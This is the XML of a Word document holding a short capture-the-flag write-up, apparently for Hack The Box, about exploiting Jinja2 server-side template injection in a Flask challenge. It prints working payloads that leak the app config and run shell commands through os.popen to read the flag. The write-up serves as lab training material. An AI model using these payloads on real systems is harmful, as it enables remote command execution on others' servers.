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F9E58" w14:textId="7375C260" w:rsidR="00CA36F0" w:rsidRDefault="00306710">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00306710">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="334DCB0C" wp14:editId="283C4CC0">
            <wp:extent cx="5274310" cy="152654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C135" w14:textId="4C69BF16" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect to </w:t>
      </w:r>
      <w:r w:rsidRPr="00306710">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>144.126.196.214:32329</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A0328" w14:textId="069F68A5" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00306710">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74FED0F5" wp14:editId="6EA337C5">
            <wp:extent cx="4000706" cy="107320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40F5" w14:textId="7F928DA8" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>While monitoring the network simultaneously there is nothing there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34517585" w14:textId="0F5F61ED" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Trying to search /robots.txt – Nope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7BFF9" w14:textId="45D36F87" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>What about Flask/Jinja2? What it is?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A7418" w14:textId="437B5C08" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Server side is actually built from python library with special looking for variables: {{user.name}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>} ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> etc..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AF0AB" w14:textId="21983A82" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>When I inject some string like "Michael" I saw:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68095634" w14:textId="0F340903" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00306710">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123CE51B" wp14:editId="452DF59B">
            <wp:extent cx="5131064" cy="476274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796D" w14:textId="693EDB4D" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00306710">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14388E86" wp14:editId="58C06DBD">
            <wp:extent cx="2559182" cy="901746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0B8A" w14:textId="6C688C24" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00306710">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD83913" wp14:editId="24124833">
            <wp:extent cx="2514729" cy="1828894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2317" w14:textId="3C16A036" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this is server side injection but we need to figure it out which code to inject…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738992C" w14:textId="44C981A1" w:rsidR="00E6097C" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>After some search</w:t>
      </w:r>
      <w:r w:rsidR="00E6097C">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00E6097C" w:rsidRPr="00CA4FD7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/payloadbox/ssti-payloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39792C3C" w14:textId="1C374FB3" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="00E6097C">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> I inject</w:t>
      </w:r>
      <w:r w:rsidR="00E6097C">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the path</w:t>
      </w:r>
      <w:r w:rsidR="00E6097C">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6097C">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>config.items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()}}</w:t>
      </w:r>
      <w:r w:rsidR="00E6097C">
        <w:t>" the results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477D0E4" w14:textId="25E18E1A" w:rsidR="0048697F" w:rsidRDefault="0048697F" w:rsidP="0048697F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0048697F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59153F1B" wp14:editId="6BB64912">
            <wp:extent cx="5274310" cy="2843530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91E8" w14:textId="77777777" w:rsidR="0048697F" w:rsidRDefault="00306710" w:rsidP="00306710">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>I saw that the server</w:t>
      </w:r>
      <w:r w:rsidR="0048697F">
        <w:t xml:space="preserve"> leak data like I wanted…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288164C1" w14:textId="77777777" w:rsidR="0048697F" w:rsidRDefault="0048697F" w:rsidP="0048697F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I played with around and get: </w:t>
      </w:r>
      <w:r w:rsidRPr="0048697F">
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>config._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>_class__.__init__.__globals__['os'].popen('</w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="0048697F">
        <w:t>').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E4FA69" w14:textId="67339E9E" w:rsidR="00306710" w:rsidRDefault="00306710" w:rsidP="0048697F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0048697F" w:rsidRPr="0048697F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65577E11" wp14:editId="261DFB04">
            <wp:extent cx="5274310" cy="1101090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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4580" w14:textId="2D160F35" w:rsidR="0048697F" w:rsidRDefault="0048697F" w:rsidP="0048697F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So I injected: </w:t>
      </w:r>
      <w:r w:rsidRPr="0048697F">
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>config._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>_class__.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>__.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>globals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>__['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>'].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0048697F">
        <w:t>('</w:t>
      </w:r>
      <w:r>
        <w:t>cat flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0048697F">
        <w:t>').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42523879" w14:textId="456EDA01" w:rsidR="008621BC" w:rsidRDefault="008621BC" w:rsidP="008621BC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008621BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C144EF0" wp14:editId="11D54BB1">
            <wp:extent cx="5274310" cy="815340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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2BE8" w14:textId="099F2772" w:rsidR="00FE5BF0" w:rsidRDefault="00FE5BF0" w:rsidP="00FE5BF0">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42590F41" w14:textId="585601CF" w:rsidR="0048697F" w:rsidRDefault="0048697F" w:rsidP="0048697F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0048697F" w:rsidSect="0095707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F0"/>
    <w:rsid w:val="00306710"/>
    <w:rsid w:val="0048697F"/>
    <w:rsid w:val="008621BC"/>
    <w:rsid w:val="00957079"/>
    <w:rsid w:val="00CA36F0"/>
    <w:rsid w:val="00E6097C"/>
    <w:rsid w:val="00FE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9288F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{735020AB-11C0-4F4F-A680-380A4DCD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6097C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60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github.com/payloadbox/ssti-payloa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150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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-03T14:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-03T14:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>